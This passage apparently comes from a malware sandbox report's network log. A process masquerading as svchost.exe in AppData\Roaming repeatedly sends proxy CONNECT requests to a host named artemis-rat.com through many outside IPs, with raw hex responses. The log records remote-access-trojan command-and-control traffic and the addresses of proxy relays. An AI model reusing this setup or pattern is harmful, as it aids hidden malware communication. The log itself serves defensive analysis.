3567	192.168.2.5	57721	148.72.206.84	2536	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.176824093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3568	192.168.2.5	61245	190.128.228.182	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.178103924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.539026976 CET	1286	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:37 GMT Server: Apache/2.4.56 (Ubuntu) Set-Cookie: PHPSESSID=5vviiqd350dck1iuikbgirduku; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 5101 Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 69 6d 67 2f 66 75 74 75 72 61 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 55 54 55 52 41 31 30 30 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 20 46 6f 6e 74 66 61 63 65 73 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 66 6f 6e 74 2d 66 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2d 35 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 6d 64 69 2d 66 6f 6e 74 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 69 63 2d 66 6f 6e 74 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 0d 0a 3c 21 2d 2d 20 63 6f 64 69 67 6f 73 20 43 53 53 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 61 6e 69 6d 73 69 74 69 6f 6e 2f 61 6e 69 6d 73 69 74 69 6f 6e 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="icon" href="static/src/img/futura.png"> <title>FUTURA100</title><link href="css/style.css" rel="stylesheet" media="all">... Fontfaces CSS--><link href="css/font-face.css" rel="stylesheet" media="all"><link href="codigos/font-awesome-5/css/fontawesome-all.min.css" rel="stylesheet" media="all">...<link href="codigos/mdi-font/css/material-design-iconic-font.min.css" rel="stylesheet" media="all">-->... Bootstrap CSS--><link href="static/lib/css/bootstrap/bootstrap.css" rel="stylesheet" media="all">... codigos CSS<link href="codigos/animsition/animsition.min.css" rel="stylesheet" media="all"><link href="codigos/perfect-scrollbar/perfect-scrollbar.css" rel="stylesheet" media="all">-->...
Mar 9, 2024 13:14:37.539043903 CET	1286	IN	Data Raw: 20 4d 61 69 6e 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 74 6f 75 72 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 Data Ascii: Main CSS--><link href="css/bootstrap-tour.min.css" rel="stylesheet" media="all"><link href="css/bootstrap-tour-standalone.css" rel="stylesheet" media="all"><link href="css/theme.css" rel="stylesheet" media="all"><link rel="stylesh
Mar 9, 2024 13:14:37.539136887 CET	1286	IN	Data Raw: 74 72 61 70 2d 74 6f 75 72 2d 30 2e 31 32 2e 30 2f 72 65 74 69 6e 61 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 Data Ascii: trap-tour-0.12.0/retina.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/xlsx/0.18.5/xlsx.full.min.js" integrity="sha512-r22gChDnGvBylk90+2e/ycr3RVrDi8DIOkIGNhJlKfuyQM4tIRAI062MaV8sfjQKYVGjOBaZBOA87z+IhZE9DA==" crossorigi
Mar 9, 2024 13:14:37.539211988 CET	1286	IN	Data Raw: 69 c3 b3 6e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e Data Ascii: in</button> </div> </div> </div> </div> <div class="p-3 d-flex justify-content-center mt-5" style="background-color: rgba(0, 0, 0, -0.9);width: 400px; margin-left:auto;margin-r
Mar 9, 2024 13:14:37.539277077 CET	298	IN	Data Raw: 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6c 6f 67 69 Data Ascii: <script src="static/src/js/main.js"></script> <script src="static/src/js/login.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootstrap-tour.min.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootst
Mar 9, 2024 13:14:37.576431990 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 ac 24 66 dd f1 b9 a7 82 8c ee 8f 4e 71 84 fd e6 d8 b6 4e 56 53 3a f7 70 c2 94 c9 1d f8 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eR$fNqNVS:p*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:37.934115887 CET	494	IN	HTTP/1.1 400 Bad Request Date: Sat, 09 Mar 2024 12:14:37 GMT Server: Apache/2.4.56 (Ubuntu) Content-Length: 312 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 67 72 2e 66 75 74 75 72 61 31 30 30 2e 63 6f 6d 2e 70 79 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Ubuntu) Server at agr.futura100.com.py Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3569	192.168.2.5	60919	45.11.95.165	5219	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.179649115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3570	192.168.2.5	57586	45.11.95.166	6014	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.182183027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3571	192.168.2.5	61295	51.75.126.150	35632	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.185024023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3572	192.168.2.5	61347	107.181.161.81	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.186780930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3573	192.168.2.5	61271	103.23.100.1	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.186935902 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3574	192.168.2.5	57403	103.148.51.19	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.193167925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3575	192.168.2.5	61361	172.67.182.150	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.196062088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.350497961 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3576	192.168.2.5	61460	36.94.2.138	443	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.198401928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3577	192.168.2.5	60085	181.78.79.63	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.198687077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3578	192.168.2.5	59988	103.118.44.156	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.199323893 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3579	192.168.2.5	61465	36.94.2.138	443	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.199553013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3580	192.168.2.5	61468	36.94.2.138	443	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.203699112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3581	192.168.2.5	61275	103.42.57.13	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.206895113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.216887951 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3582	192.168.2.5	61044	36.134.91.82	8888	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.233306885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.333554983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3583	192.168.2.5	60979	199.58.184.97	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.234266996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3584	192.168.2.5	61201	90.188.250.16	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.235131025 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.145977974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3585	192.168.2.5	61351	52.73.224.54	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.235905886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.452919960 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:37 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3586	192.168.2.5	61392	185.162.229.127	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.236732006 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.391053915 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3587	192.168.2.5	61376	104.24.136.68	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.240022898 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.394479990 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3588	192.168.2.5	57863	45.81.232.17	47056	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.245850086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3589	192.168.2.5	61390	34.49.208.221	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.252599955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3590	192.168.2.5	60110	37.187.77.58	52593	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.253942966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3591	192.168.2.5	61408	185.238.228.240	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.262531996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.416856050 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3592	192.168.2.5	61098	117.160.250.163	82	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
